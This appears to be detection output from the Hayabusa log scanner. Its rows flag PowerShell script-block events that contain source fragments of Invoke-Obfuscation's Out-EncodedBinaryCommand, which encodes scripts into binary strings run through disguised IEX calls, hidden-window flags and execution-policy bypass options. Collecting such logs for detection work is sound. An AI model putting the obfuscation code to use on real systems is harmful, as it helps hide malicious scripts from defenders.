')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. 
$EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. 
$SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.262 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. 
# These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. 
$InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. 
$CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.262 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.262 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. 
$InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. 
$CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.266 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedBinaryCommand { <# .SYNOPSIS Generates binary encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedBinaryCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedBinaryCommand encodes an input PowerShell scriptblock or path as a binary payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. 
.PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedBinaryCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive powershell -NonIn -NoProf ""-Join ('1010111y1110010W1101001{1110100G1100101y101101;1001000T1101111@1110011G1110100y100000@100111y1001000@1100101d1101100<1101100b1101111d100000W1010111@1101111G1110010{1101100@1100100@100001<100111G100000y101101;1000110;1101111y1110010G1100101d1100111y1110010G1101111@1110101W1101110b1100100G1000011;1101111d1101100{1101111y1110010d100000<1000111<1110010T1100101W1100101@1101110d111011{100000T1010111{1110010{1101001{1110100y1100101b101101<1001000y1101111{1110011W1110100d100000d100111b1001111<1100010b1100110<1110101d1110011W1100011W1100001T1110100T1101001{1101111;1101110W100000T1010010b1101111<1100011W1101011;1110011;100001d100111@100000y101101<1000110T1101111G1110010{1100101W1100111{1110010G1101111d1110101W1101110@1100100@1000011{1101111d1101100y1101111T1110010{100000{1000111{1110010T1100101b1100101;1101110'-SplIt'b'-SpLit '@'-SPLIt '{' -SpLIT'<'-SPLIT'd' -SpLIT 'T'-SplIt ';' -SpLiT 'G' -SPLiT'y'-SpLiT'W' | ForEach-Object { ([Char]([Convert]::ToInt16(( $_.ToString() ) ,2) ))} )| IEX"" C:\PS> Out-EncodedBinaryCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive -PassThru IEX( -Join ('1010111<1110010>1101001a1110100>1100101r101101{1001000@1101111l1110011l1110100a100000<100111m1001000r1100101{1101100{1101100{1101111>100000{1010111>1101111>1110010m1101100O1100100a100001O100111&100000@101101&1000110<1101111a1110010&1100101&1100111O1110010r1101111r1110101<1101110O1100100m1000011{1101111>1101100m1101111{1110010m100000{1000111a1110010>1100101>1100101m1101110&111011O100000r1010111&1110010l1101001{1110100{1100101r101101@1001000&1101111>1110011<1110100&100000>100111a1001111{1100010a1100110@1110101{1110011&1100011r1100001@1110100l1101001>1101111a1101110a100000@1010010a1101111r1100011a1101011m1110011{100001<100111a100000{101101@1000110a1101111{1110010m1100101a1100111>1110010l1101111m1110101l1101110@1100100r1000011&1101111r1101100O1101111m1110010a100000@1000111@1110010O1100101@1100101@1101110'.Split( 'l@>{r [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 2 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. 
as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Binary values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. 
$ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. 
